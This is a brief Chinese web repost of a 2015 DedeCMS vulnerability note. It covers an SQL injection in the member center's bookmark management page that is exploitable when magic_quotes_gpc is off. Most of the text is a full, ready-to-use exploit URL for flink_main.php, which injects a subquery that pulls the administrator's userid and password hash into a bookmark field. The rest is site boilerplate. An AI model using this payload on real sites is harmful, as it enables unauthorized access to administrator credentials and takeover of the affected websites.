来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] DedeCMS会员中心SQL注射漏洞需要magic_quotes_gpc = Off会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.DedeCMS会员中心书签管理SQL注射漏洞成功利用该漏洞可获得管理员密码会员登...
|
DedeCMS会员中心SQL注射漏洞
需要magic_quotes_gpc = Off
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
DedeCMS会员中心书签管理SQL注射漏洞
成功利用该漏洞可获得管理员密码
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
http://www.2cto.com /member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
